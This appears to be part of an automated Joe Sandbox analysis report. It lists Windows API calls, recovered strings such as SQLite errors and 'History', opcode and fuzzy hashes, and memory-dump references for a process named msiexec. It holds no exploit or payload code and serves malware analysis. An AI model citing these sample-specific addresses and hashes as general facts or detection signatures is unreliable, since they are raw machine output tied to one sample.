                                                    • memcpy.MSVCRT(?,?,?,00000000,?,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408EC5
                                                    • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408EF2
                                                    • memcpy.MSVCRT(?,00000000,00000014,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408F07
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: memcpy$memsetstrlen
                                                    • String ID:
                                                    • API String ID: 2350177629-0
                                                    • Opcode ID: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                    • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                                    • Opcode Fuzzy Hash: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                    • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: memset
                                                    • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                    • API String ID: 2221118986-1606337402
                                                    • Opcode ID: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                    • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                                    • Opcode Fuzzy Hash: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                    • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                                                    APIs
                                                    • _mbscpy.MSVCRT(?,00000000,00000000,?,00000001), ref: 00408F50
                                                    • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,?,?,00000010,?,00000000,?,00000001), ref: 00408FB3
                                                    • memset.MSVCRT ref: 00408FD4
                                                    • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,00000010,?,00000000,?,00000001), ref: 00409025
                                                    • memset.MSVCRT ref: 00409042
                                                    • memcpy.MSVCRT(?,?,00000018,00000001,?,?,00000020,?,?,?,?,00000000,?,00000001), ref: 00409079
                                                      • Part of subcall function 00408C3C: strlen.MSVCRT ref: 00408C96
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: memcmpmemset$_mbscpymemcpystrlen
                                                    • String ID:
                                                    • API String ID: 265355444-0
                                                    • Opcode ID: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                    • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                                                    • Opcode Fuzzy Hash: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                    • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                                                    APIs
                                                    • memset.MSVCRT ref: 004116FF
                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                      • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                      • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                      • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                      • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                      • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                      • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                      • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                      • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                      • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                      • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                      • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                    • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                    • API String ID: 2618321458-3614832568
                                                    • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                    • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                    • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                    • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: AttributesFilefreememset
                                                    • String ID:
                                                    • API String ID: 2507021081-0
                                                    • Opcode ID: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                    • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                    • Opcode Fuzzy Hash: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                    • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                    APIs
                                                    • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                    • malloc.MSVCRT ref: 00417524
                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                    • free.MSVCRT ref: 00417544
                                                    • free.MSVCRT ref: 00417562
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                    • String ID:
                                                    • API String ID: 4131324427-0
                                                    • Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                    • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                    • Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                    • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                    APIs
                                                    • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                    • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                    • free.MSVCRT ref: 0041822B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: PathTemp$free
                                                    • String ID: %s\etilqs_$etilqs_
                                                    • API String ID: 924794160-1420421710
                                                    • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                    • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                    • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                    • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                    APIs
                                                    • memset.MSVCRT ref: 0040FDD5
                                                      • Part of subcall function 00414E7F: memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                      • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                      • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                    • _snwprintf.MSVCRT ref: 0040FE1F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                    • String ID: <%s>%s</%s>$</item>$<item>
                                                    • API String ID: 1775345501-2769808009
                                                    • Opcode ID: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                    • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                                                    • Opcode Fuzzy Hash: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                    • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: ErrorLastMessage_snwprintf
                                                    • String ID: Error$Error %d: %s
                                                    • API String ID: 313946961-1552265934
                                                    • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                    • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                    • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                    • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: foreign key constraint failed$new$oid$old
                                                    • API String ID: 0-1953309616
                                                    • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                    • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                    • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                    • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                                    APIs
                                                    Strings
                                                    • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                    • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                    • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: memcpy
                                                    • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                    • API String ID: 3510742995-272990098
                                                    • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                    • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                    • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                    • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                    APIs
                                                      • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                      • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                      • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                                    • memset.MSVCRT ref: 0040C439
                                                    • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                    • _wcsupr.MSVCRT ref: 0040C481
                                                      • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                      • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                      • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                      • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                    • memset.MSVCRT ref: 0040C4D0
                                                    • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: free$EnumValuememset$_wcsuprmemcpywcslen
                                                    • String ID:
                                                    • API String ID: 1265369119-0
                                                    • Opcode ID: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                                    • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                    • Opcode Fuzzy Hash: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                                    • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                    APIs
                                                    • memset.MSVCRT ref: 0044A6EB
                                                    • memset.MSVCRT ref: 0044A6FB
                                                    • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                    • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: memcpymemset
                                                    • String ID: gj
                                                    • API String ID: 1297977491-4203073231
                                                    • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                    • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                    • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                    • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                    APIs
                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E961
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E974
                                                    • ??3@YAXPAX@Z.MSVCRT(00000001,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E987
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E99A
                                                    • free.MSVCRT ref: 0040E9D3
                                                      • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: ??3@$free
                                                    • String ID:
                                                    • API String ID: 2241099983-0
                                                    • Opcode ID: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                                    • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                    • Opcode Fuzzy Hash: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                                    • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                    APIs
                                                    • AreFileApisANSI.KERNEL32 ref: 00417497
                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                    • malloc.MSVCRT ref: 004174BD
                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                    • free.MSVCRT ref: 004174E4
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                    • String ID:
                                                    • API String ID: 4053608372-0
                                                    • Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                    • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                    • Opcode Fuzzy Hash: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                    • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                    APIs
                                                    • GetParent.USER32(?), ref: 0040D453
                                                    • GetWindowRect.USER32(?,?), ref: 0040D460
                                                    • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                    • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                    • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: Window$Rect$ClientParentPoints
                                                    • String ID:
                                                    • API String ID: 4247780290-0
                                                    • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                    • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                    • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                    • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                    APIs
                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                    • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                    • ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                    • memset.MSVCRT ref: 004450CD
                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                      • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                      • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                      • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                      • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                    • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                    • String ID:
                                                    • API String ID: 1471605966-0
                                                    • Opcode ID: 1d83234f6ed1c703cc9b29937d58b4133add7b8d770e5fab418e64e17a94a812
                                                    • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                    • Opcode Fuzzy Hash: 1d83234f6ed1c703cc9b29937d58b4133add7b8d770e5fab418e64e17a94a812
                                                    • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                    APIs
                                                    • wcscpy.MSVCRT ref: 0044475F
                                                    • wcscat.MSVCRT ref: 0044476E
                                                    • wcscat.MSVCRT ref: 0044477F
                                                    • wcscat.MSVCRT ref: 0044478E
                                                      • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                      • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                      • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?,004447CD,?,?,?,00000000,?), ref: 00409AA5
                                                      • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                    • String ID: \StringFileInfo\
                                                    • API String ID: 102104167-2245444037
                                                    • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                    • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                    • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                    • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                    APIs
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: ??3@
                                                    • String ID:
                                                    • API String ID: 613200358-0
                                                    • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                    • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                    • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                    • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: _memicmpwcslen
                                                    • String ID: @@@@$History
                                                    • API String ID: 1872909662-685208920
                                                    • Opcode ID: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                    • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                                    • Opcode Fuzzy Hash: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                    • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                                    APIs
                                                    • memset.MSVCRT ref: 004100FB
                                                    • memset.MSVCRT ref: 00410112
                                                      • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                      • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                    • _snwprintf.MSVCRT ref: 00410141
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: memset$_snwprintf_wcslwrwcscpy
                                                    • String ID: </%s>
                                                    • API String ID: 3400436232-259020660
                                                    • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                    • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                    • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                    • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                    APIs
                                                    • memset.MSVCRT ref: 0040D58D
                                                    • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                    • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: ChildEnumTextWindowWindowsmemset
                                                    • String ID: caption
                                                    • API String ID: 1523050162-4135340389
                                                    • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                    • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                    • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
